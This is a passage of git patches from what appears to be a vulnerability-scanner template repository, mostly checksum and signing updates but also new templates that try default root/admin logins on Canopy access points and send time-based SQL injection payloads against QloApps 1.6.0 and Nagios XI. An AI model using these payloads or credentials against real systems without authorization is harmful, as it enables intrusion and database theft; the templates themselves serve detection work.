author: CravateRouge severity: info - metadata: - max-request: 1 - shodan-query: html:"DXR.axd" - description: "Detect DevExpress based on existence of its HTTP handler for serving images, scripts and other resources to the client side" + description: | + Detect DevExpress based on the existence of its HTTP handler for serving images, scripts, and other resources to the client side. reference: - https://github.com/DevExpress/aspnet-security-bestpractices/blob/master/SecurityBestPractices.WebForms/README.md#53-information-exposure-through-source-code - https://supportcenter.devexpress.com/ticket/details/q311748/dxr-axd-what-is-it-and-how-to-disable-it + metadata: + max-request: 1 + shodan-query: html:"DXR.axd" tags: devexpress,iis,microsoft,asp,tech http: From c7799ea833b6e829863148170ae79cff97f6a01f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:18:42 +0000 Subject: [PATCH 105/847] Auto Generated Templates Checksum [Wed May 22 09:18:42 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6da2281537..369c13b33a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4053,7 +4053,7 @@ http/exposed-panels/metasploit-panel.yaml:35d1b6eb3b01af19738d113656574141b5de32 http/exposed-panels/metasploit-setup-page.yaml:b80a5e11ce34feedcc9992dc5e48f4dbf72f3a3d http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a058 http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b -http/exposed-panels/microfocus-admin-server.yaml:00599e41ed1d3fc84e5841f8a4bf52118c9a200a +http/exposed-panels/microfocus-admin-server.yaml:a9b19236d2d61852079741c8757e75f08d10e371 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 http/exposed-panels/microfocus-vibe-panel.yaml:d911b51310fcb45341a2a1bba8817ac270ebb08b http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 @@ -5442,7 +5442,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:d5fdda436ae9b456dca704c3a61af9cf9cd1d64d http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 -http/misconfiguration/installer/openfire-setup.yaml:283f6cdfa7c96e723575f73af2769a7a89b60b22 +http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b3664bc5167fb4cafb15723d8d7 http/misconfiguration/installer/opensis-installer.yaml:8a0c4bf9bb56f866b4b4d3d0f4eb97837d4436fc @@ -8547,7 +8547,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:edbf51a3019bb4b115206be60f9fc068771f1242 +templates-checksum.txt:5ebd9a60f10091bce3c5b24480eef01e46262b22 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From aed0b26a6c409e5c07fc9400c580a9a1775da657 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:20:25 +0000 Subject: [PATCH 106/847] Auto Template Signing [Wed May 22 09:20:25 UTC 2024] :robot: --- http/exposed-panels/microfocus-admin-server.yaml | 1 + http/misconfiguration/installer/octoprint-installer.yaml | 1 + http/misconfiguration/installer/xbackbone-installer.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index 3557a411ea..ebfc273cf2 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -44,3 +44,4 @@ http: regex: - '(?i)Micro\s+Focus\s+Open\s+Enterprise\s+Server\s+([A-Z0-9\s]+)' - '(?i)Copyright\s+([0-9]+)\s+Micro\s+Focus' +# digest: 4a0a004730450221008e8de980426ff5dfbe891462f66adba778378809ee555a753acd392e6e42f3120220736941a25c53cc07f48d8b31ded16956e7272d61407784ebd5b6faf86d43a70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/octoprint-installer.yaml b/http/misconfiguration/installer/octoprint-installer.yaml index e21886aefa..5a90a95d62 100644 --- a/http/misconfiguration/installer/octoprint-installer.yaml +++ b/http/misconfiguration/installer/octoprint-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502201afe0cd54faef3001ad0a7ff031eaefe958735bf100c5b0f1ff3c3bb837d705802210086f5f4d06e62171a2fa10da2112156e9d0f32dcd0588ad65211fa80ffa994799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/xbackbone-installer.yaml b/http/misconfiguration/installer/xbackbone-installer.yaml index fa5217e3ca..df0f9b4ee9 100644 --- a/http/misconfiguration/installer/xbackbone-installer.yaml +++ b/http/misconfiguration/installer/xbackbone-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100d5682a4b684ba38ddfddbd20405302b95efee06045bd008d6fb666491c1c299a022066a7ab62467668cd36862cb21035bf3b5d3762b126e37c784dd0a594b056b3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9574cf4068f1b90c1b3c764e1dd832b0d38155e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:20:46 +0000 Subject: [PATCH 108/847] Auto Generated Templates Checksum [Wed May 22 09:20:46 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 369c13b33a..38fe9b1856 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6705,7 +6705,7 @@ http/technologies/dell/dell-idrac7-detect.yaml:60e624f4f081e596c1ae1292ea18f99d7 http/technologies/dell/dell-idrac8-detect.yaml:1dff3a1be021d38ea8846d6151c920edbf995f3e http/technologies/dell/dell-idrac9-detect.yaml:44da5eecdb4a220ccde1aecdd8c801986a988367 http/technologies/detect-sentry.yaml:f4f51185253e23a6e3db1f4bbcb1a37bebf4da1a -http/technologies/devexpress-detect.yaml:6a5327a8a84357f2e365da16936697859e0f6020 +http/technologies/devexpress-detect.yaml:62dc0662669d161ebe6dd65e01b544f9a393965a http/technologies/directus-detect.yaml:cfea1a80217c3f05df1da02ecd2cf60e988699d5 http/technologies/dreambox-detect.yaml:35362632d9ed50a1e5b4513bfc5a09543c63e431 http/technologies/drupal-detect.yaml:5c269fdf58cf085a8ac062b1f23cd8b3a0ef7f99 @@ -8547,7 +8547,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5ebd9a60f10091bce3c5b24480eef01e46262b22 +templates-checksum.txt:7ee13e971e67779248aab896dc65a9e8aa6433b2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7f92771a6dbff236b0a332dfe643534a966d1326 Mon Sep 17 00:00:00 2001 From: Bradley D Date: Wed, 22 May 2024 07:02:38 -0600 Subject: [PATCH 109/847] Added canopy-access-point-default-login.yaml This template will detect canopy access points that allow the default login --- .../canopy-access-point-default-login.yaml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/default-logins/cambium-networks/canopy-access-point-default-login.yaml diff --git a/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml b/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml new file mode 100644 index 0000000000..61eae66bb8 --- /dev/null +++ b/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml @@ -0,0 +1,43 @@ +id: cambium-networks-canopy-access-point-default-login + +info: + name: Canopy 5.7GHz Access Point - Default Login + author: defektive + severity: high + description: | + Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered. + # metadata: + # verified: true + # max-request: 1 + # fofa-query: title="Welcome to Canopy" + tags: default-login,cambium-networks,5750AP + +http: + - raw: + - | + POST /login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + &Session=0&CanopyUsername={{username}}&CanopyPassword={{password}}&login=Login&webguisubmit=submit + + attack: pitchfork + payloads: + username: + - root + - admin + password: + - root + - admin + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Logged in as root" + condition: and + + - type: status + status: + - 200 From 4446b0e219be864c3cc10fc29cb38578af962277 Mon Sep 17 00:00:00 2001 From: isikabdullah44 <108897267+isikabdullah44@users.noreply.github.com> Date: Wed, 22 May 2024 21:05:24 +0000 Subject: [PATCH 110/847] adds template to detect bitvise service --- network/detection/bitvise-detect.yaml | 35 +++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 network/detection/bitvise-detect.yaml diff --git a/network/detection/bitvise-detect.yaml b/network/detection/bitvise-detect.yaml new file mode 100644 index 0000000000..59125af37c --- /dev/null +++ b/network/detection/bitvise-detect.yaml @@ -0,0 +1,35 @@ +id: bitvise-detect + +info: + name: Bitvise Service - Detect + author: abdullahisik + severity: info + description: | + Bitvise service was detected. + reference: + - https://www.bitvise.com/ + - https://vulners.com/openvas/OPENVAS:1361412562310813387 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + cpe: cpe:/a:bitvise:winsshd + metadata: + shodan-query: product:"bitvise" + max-request: 1 + tags: seclists,network,ssh,bitvise,detect + +tcp: + - host: + - "{{Hostname}}" + port: 22 + + matchers: + - type: regex + regex: + - '(?i)Bitvise' + + extractors: + - type: regex + regex: + - "SSH-([0-9.]+)-([0-9.]+) .*" From dd32cc42116755696dbf8342959ffe02261923ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 09:05:54 +0530 Subject: [PATCH 111/847] Create qloapps-installer.yaml --- .../installer/qloapps-installer.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/installer/qloapps-installer.yaml diff --git a/http/misconfiguration/installer/qloapps-installer.yaml b/http/misconfiguration/installer/qloapps-installer.yaml new file mode 100644 index 0000000000..87064f012c --- /dev/null +++ b/http/misconfiguration/installer/qloapps-installer.yaml @@ -0,0 +1,32 @@ +id: qloapps-installer + +info: + name: QloApps - Installation + author: ritikchaddha + severity: high + description: | + QloApps Installation Assistant panel exposure. + metadata: + verified: true + max-request: 1 + fofa-query: title="QloApps Installation" + tags: install,qloapps,misconfig,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "QloApps Installation" + case-insensitive: true + + - type: status + status: + - 200 From 03b5315e5511084f21c5f98a7838eb46a2897dd6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 09:39:31 +0530 Subject: [PATCH 112/847] Create CVE-2023-36284.yaml --- http/cves/CVE-2023-36284.yaml | 59 +++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 http/cves/CVE-2023-36284.yaml diff --git a/http/cves/CVE-2023-36284.yaml b/http/cves/CVE-2023-36284.yaml new file mode 100644 index 0000000000..92667d236c --- /dev/null +++ b/http/cves/CVE-2023-36284.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-36284 + +info: + name: QloApps 1.6.0 - SQL Injection + author: ritikchaddha + severity: high + description: | + An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database. + impact: | + Successful exploitation could lead to unauthorized access to sensitive data. + remediation: | + Apply the vendor-supplied patch or upgrade to a non-vulnerable version. + reference: + - https://flashy-lemonade-192.notion.site/Time-Based-SQL-injection-in-QloApps-1-6-0-be3ed1bdaf784a77b45dc6898a2de17e + - https://nvd.nist.gov/vuln/detail/CVE-2023-36284 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-36284 + cwe-id: CWE-89 + epss-score: 0.00061 + epss-percentile: 0.24798 + cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + vendor: webkul + product: qloapps + fofa-query: title="QloApps" + tags: cve,cve2023,qloapps,sqli + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/2 + Host: {{Hostname}} + + matchers: + - type: word + part: body + internal: true + words: + - "QloApps" + case-insensitive: true + + - raw: + - | + @timeout: 20s + GET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/2 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - duration>=5 + - 'contains(body, "<span>Guest Information")' + condition: and From a16b4473ea6491716bebfd163be2c01e8af5b780 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 10:16:59 +0530 Subject: [PATCH 113/847] Create CVE-2023-48084.yaml --- http/cves/2023/CVE-2023-48084.yaml | 70 ++++++++++++++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 http/cves/2023/CVE-2023-48084.yaml diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml new file mode 100644 index 0000000000..5c4c293207 --- /dev/null +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -0,0 +1,70 @@ +id: CVE-2023-48084 + +info: + name: Nagios XI < 5.11.3 - SQL Injection + author: ritikchaddha + severity: critical + description: | + SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool. + impact: | + Successful exploitation could lead to unauthorized access to sensitive information. + remediation: | + Apply the vendor-supplied patch or upgrade to a non-vulnerable version. + reference: + - https://github.com/bucketcat/CVE-2023-48084 + - https://github.com/Hamibubu/CVE-2023-48084 + - https://nvd.nist.gov/vuln/detail/CVE-2023-48084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-48084 + cwe-id: CWE-89 + epss-score: 0.00114 + epss-percentile: 0.44333 + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + verified: true + vendor: nagios + product: nagios_xi + fofa-query: title="Nagios XI" + tags: cve,cve2023,nagiosxi,sqli,authenticated + +http: + - raw: + - | + GET /nagiosxi/login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /nagiosxi/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton= + + - | + @timeout: 15s + GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + + skip-variables-check: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration_3>=5' + - 'contains(body_3, "Home Dashboard</a>")' + condition: and + + extractors: + - type: regex + name: nsp + part: body + group: 1 + regex: + - 'name="nsp" value="(.*)">' + internal: true From 32e75ffaeccf9e60d4fe7975882598ef46f983aa Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 10:17:38 +0530 Subject: [PATCH 114/847] Rename http/cves/CVE-2023-36284.yaml to http/cves/2023/CVE-2023-36284.yaml --- http/cves/{ => 2023}/CVE-2023-36284.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/cves/{ => 2023}/CVE-2023-36284.yaml (100%) diff --git a/http/cves/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml similarity index 100% rename from http/cves/CVE-2023-36284.yaml rename to http/cves/2023/CVE-2023-36284.yaml From c4d207d5dda8744eb86cd79c0f1f80a264f2261a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 10:36:34 +0530 Subject: [PATCH 115/847] minor update --- ...n.yaml => cambium-networks-default-login.yaml} | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) rename http/default-logins/cambium-networks/{canopy-access-point-default-login.yaml => cambium-networks-default-login.yaml} (80%) diff --git a/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml similarity index 80% rename from http/default-logins/cambium-networks/canopy-access-point-default-login.yaml rename to http/default-logins/cambium-networks/cambium-networks-default-login.yaml index 61eae66bb8..8e8af91d8d 100644 --- a/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -1,4 +1,4 @@ -id: cambium-networks-canopy-access-point-default-login +id: cambium-networks-default-login info: name: Canopy 5.7GHz Access Point - Default Login @@ -6,11 +6,11 @@ info: severity: high description: | Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered. - # metadata: - # verified: true - # max-request: 1 - # fofa-query: title="Welcome to Canopy" - tags: default-login,cambium-networks,5750AP + metadata: + verified: true + max-request: 1 + fofa-query: title="Welcome to Canopy" + tags: default-login,cambium-networks http: - raw: @@ -29,9 +29,10 @@ http: password: - root - admin + + stop-at-first-match: true matchers-condition: and matchers: - - type: word part: body words: From b291eb6a48931af752540beb9c1ca6a5e2f5a625 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 10:40:40 +0530 Subject: [PATCH 116/847] minor update --- http/cves/2022/CVE-2022-1580.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index 6fd7cfb485..4dca43836e 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -34,7 +34,7 @@ http: - type: word internal: true words: - - 'Site Offline Or Coming Soon Or Maintenance Mode ' #Plugin Check + - 'Site Offline Or Coming Soon Or Maintenance Mode' - method: GET path: @@ -49,4 +49,4 @@ http: condition: or - type: status status: - - 200 \ No newline at end of file + - 200 From 37b8555bcb875e5134555351ac4722a04a62b940 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:40:43 +0000 Subject: [PATCH 117/847] Auto Generated New Template Addition List [Thu May 23 05:40:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 994432f283..11f2eb1607 100644 --- a/.new-additions +++ b/.new-additions @@ -36,6 +36,7 @@ http/misconfiguration/installer/octoprint-installer.yaml http/misconfiguration/installer/openfire-setup.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml +http/misconfiguration/installer/wiki-js-installer.yaml http/misconfiguration/installer/xbackbone-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/apache/apache-answer-detect.yaml From 968fa472b71188c8b60c4fee4db3ac95602376cc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:40:49 +0000 Subject: [PATCH 118/847] Auto Generated Templates Checksum [Thu May 23 05:40:49 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 38fe9b1856..03792f1d77 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4053,7 +4053,7 @@ http/exposed-panels/metasploit-panel.yaml:35d1b6eb3b01af19738d113656574141b5de32 http/exposed-panels/metasploit-setup-page.yaml:b80a5e11ce34feedcc9992dc5e48f4dbf72f3a3d http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a058 http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b -http/exposed-panels/microfocus-admin-server.yaml:a9b19236d2d61852079741c8757e75f08d10e371 +http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 http/exposed-panels/microfocus-vibe-panel.yaml:d911b51310fcb45341a2a1bba8817ac270ebb08b http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 @@ -5440,7 +5440,7 @@ http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa53 http/misconfiguration/installer/nginx-auto-installer.yaml:ad565c9eee92dff96cc6487522724d96386339d9 http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d727f642283a21d8 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a -http/misconfiguration/installer/octoprint-installer.yaml:d5fdda436ae9b456dca704c3a61af9cf9cd1d64d +http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc @@ -5493,9 +5493,10 @@ http/misconfiguration/installer/webasyst-installer.yaml:89e08267f8e97215dcf80f33 http/misconfiguration/installer/webcalendar-install.yaml:030798e0e2618533f5a0f1492cfed7d9558cde7f http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764a7492dff802135 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d +http/misconfiguration/installer/wiki-js-installer.yaml:a54b3842f09194a1413ce2f7ca4130d295309dd9 http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 -http/misconfiguration/installer/xbackbone-installer.yaml:30b17b879c64fc395e02e5ba500170c6b381672d +http/misconfiguration/installer/xbackbone-installer.yaml:f5578c7d92a21b929a48e7a9569f6e00db6466b7 http/misconfiguration/installer/yzmcms-installer.yaml:cfd51c27e2bd7ce0dad274cf7d3d8a81519f6d74 http/misconfiguration/installer/zabbix-installer.yaml:c68f624b2a0260aff9280223ed8559ed9438a1b9 http/misconfiguration/installer/zencart-installer.yaml:4b3f6cc0c7a3fdf855d63035860f48020f1c602a @@ -8547,7 +8548,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7ee13e971e67779248aab896dc65a9e8aa6433b2 +templates-checksum.txt:016be23b5b120533f2a850741c18f734f970a9e3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 115697cb25a7f2bee767ba23ab5872cbcbf9ee29 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:41:25 +0000 Subject: [PATCH 119/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2546fae73c..1a7529e1a2 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -41,6 +41,7 @@ on: - 'http/misconfiguration/installer/openfire-setup.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' + - 'http/misconfiguration/installer/wiki-js-installer.yaml' - 'http/misconfiguration/installer/xbackbone-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/apache/apache-answer-detect.yaml' From 39aa029ed4099502d717c95cdff8b1bf99da7401 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:42:28 +0000 Subject: [PATCH 120/847] Auto Template Signing [Thu May 23 05:42:28 UTC 2024] :robot: --- http/misconfiguration/installer/wiki-js-installer.yaml | 1 + http/technologies/devexpress-detect.yaml | 3 +-- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml index 71f619e282..17ee145d7b 100644 --- a/http/misconfiguration/installer/wiki-js-installer.yaml +++ b/http/misconfiguration/installer/wiki-js-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100bbb2395502245442e79f84e2278eea8816e8227be09f9073f749909276f09f9502205ddadd76af727b1dccb27988ad1402b2b0363a727e91739111caaabbcc9f0843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index 7ad3dcfc73..bb75a25835 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -26,5 +26,4 @@ http: part: body words: - "DXR.axd" - -# digest: 490a0046304402207d0d186d436006888ed2ac008bf749f0e9ceea5ca1a9c1e06785922736698b7e0220627318c732b562d97957499a31a8288e274a59b561aab29325baa0df2917dc39:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 21d8dd6870896b02a910462fc47ce95ade110ebc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:45:08 +0000 Subject: [PATCH 122/847] Auto Generated Templates Checksum [Thu May 23 05:45:08 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 03792f1d77..ec787714fd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4055,7 +4055,7 @@ http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 -http/exposed-panels/microfocus-vibe-panel.yaml:d911b51310fcb45341a2a1bba8817ac270ebb08b +http/exposed-panels/microfocus-vibe-panel.yaml:6fdb456f12d78a603126580d7c77987ca475f24c http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:305a045131b9ca81c700a79e0af7eea801440d69 http/exposed-panels/mikrotik/mikrotik-routeros.yaml:dd9cf9ecc0ab355d2c3cdc748f77443cd796f24d @@ -5493,7 +5493,7 @@ http/misconfiguration/installer/webasyst-installer.yaml:89e08267f8e97215dcf80f33 http/misconfiguration/installer/webcalendar-install.yaml:030798e0e2618533f5a0f1492cfed7d9558cde7f http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764a7492dff802135 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d -http/misconfiguration/installer/wiki-js-installer.yaml:a54b3842f09194a1413ce2f7ca4130d295309dd9 